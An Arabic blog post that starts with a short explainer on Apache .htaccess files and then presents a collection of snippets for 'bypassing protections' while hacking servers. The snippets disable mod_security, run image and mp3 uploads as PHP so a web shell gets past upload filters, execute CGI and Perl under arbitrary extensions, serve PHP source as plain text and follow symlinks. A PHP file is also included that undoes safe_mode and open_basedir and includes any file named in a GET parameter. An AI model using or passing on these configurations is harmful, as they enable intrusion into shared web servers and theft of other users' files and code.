يعد ملف .htaccess في موقع الويب قويًا و يتحكم في التكوين عالي المستوى لموقع الويب الخاص بك. على الخوادم التي تشغل Apache (برنامج خادم ويب) ، يسمح لك ملف .htaccess بإجراء تغييرات على تكوين موقع الويب الخاص بك دون الحاجة إلى تعديل ملفات تكوين الخادم.

في هذا الدليل الخاص بملف .htacess ، نجيب على ماهية ملف .htaccess ، وكيفية استخدام ملف .htaccess وكيفية تحديد موقعه على خادمك ، والمزيد.
أين يوجد ملف .htaccess؟
يتم تكوين Apache (البرنامج الذي يشغل خادم الويب الخاص بك) بحيث يتم إخفاء جميع الملفات المسماة .htaccess. لماذا ا؟ تحتوي الملفات على معلومات تكوين مهمة ويمكن استخدامها لتهديد الخادم الخاص بك.
على الرغم من أن الملف مخفي ، فإن موقع ملف .htaccess هو الأكثر شيوعًا في مجلد public_html بموقعك على الويب.

و في هده التدوينة المتواضعة سوف نتكلم على احد اهم و ابرز الموضوغات الشيقة في عالم اختراق المواقع و الا و هي تخطي الحمايات في اختراق السيرفرات عن طريق ملف htaccess ف قمت ب جمع ابرز الكودات التي انت ب حاجة اليها في عمليات تخطي الحمايات
تابع معي
التحكم باصدار php
كود :
AddType application/x-httpd-php4 .php
تتغير امتداد او لاحقة php الى امتداد gif,jpg
AddType application/x-httpd-php .gif
AddType application/x-httpd-php .jpg
تحكم بcgi-s cript ولاحقاته وتشغيلها
AddHandler cgi-s cript .pp .pl .txt
تخطي الـ LiteSpeed
<Files *.php>
ForceType application/x-httpd-php4
</Files>
<ifModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
تخطي السيف مود safe_mode بحالة Suexec
suPHP_ConfigPath /home/user/public_html/php.ini
تخطي الفور بدن Forbidden
1
Options FollowSymLinks MultiViews Indexes ExecCGI
2
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php
3
Options All
DirectoryIndex ssss.html
addType txt .php
AddHandler txt .php
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
4
Options All
ReadMeName 1.txt
5
suPHP_ConfigPath /home/user/public_html/php.ini
6
Options all
Options +FollowSymLinks
DirectoryIndex Sux.html
Options +Indexes
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
7
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php
<IfModule mod_autoindex.c>
IndexOptions FancyIndexing IconsAreLinks SuppressHTMLPreamble
</ifModule>
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
تخطي انترنت سيرفر ارور HTTP 500 Internal Server Error
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
تخطي مراكز التحميل رفع الشل باي امتداد
<FilesMatch "^.*.mp3">
SetHandler application/x-httpd-php
</FilesMatch>
تشغيل البيرل باي امتداد
AddHandler cgi-script .CH
AddHandler cgi-script .txt
AddHandler cgi-script .pp
AddHandler cgi-script .pl
تشغيل البيرل وملفات السي جي اذا كان محمي منhttp.conf ببعض اضافة لاحقاته المعروفة pl,cgi
Options ExecCGI
AddType application/x-httpd-cgi .xx
AddHandler cgi-s cript .xx
تشغيل او تعطيل register_globals
php_flag register_globals "off"
تعطيل المود السيكيورتي
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
تعطيل او تشغيل open_basedir
php_flag open_basedir "off"
تغير اصدار ال php
AddType application/x-httpd-php4 .php
سحب ملف بصلاحيه يوزر
AddType text/plain .php
Options +Indexes
DirectoryIndex filename.html
سماح و تشغيل الكل
Options All
عرض وسماح لملفات الاختصار symlinks
Options FollowSymLinks
و الان الشيء المهم جدا
و هو تخطي السيف مود safe_mode
قم ب انشاء او تعديل ملف ب اسم ini.php
و ضع هادا الكود
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GETsansursansursansur91;"file"sansursansursansur93;);
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GETsansursansursansur91;"ss"sansursansursansur93;);
?>
و الان قم ب انشاء ملف ب اسم php.ini او ابحث عليه و قم ب التعديل عليه
ضع هادا الكود
safe_mode = off
تخطي SymLinks
Options +FollowSymLinks
DirectoryIndex Index.html
Options +Indexes
AddType text/plain .php
AddHandler server-parsed .php
تخطي SymLinks بقوة
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php
في الاخير اتمنى انكم قد استفدتم من هده المدونة المتواضعة و المتعوب عليها في التجميع ????
مدومة ما شاء الله و قد استفدنا منها الكثير و الكثير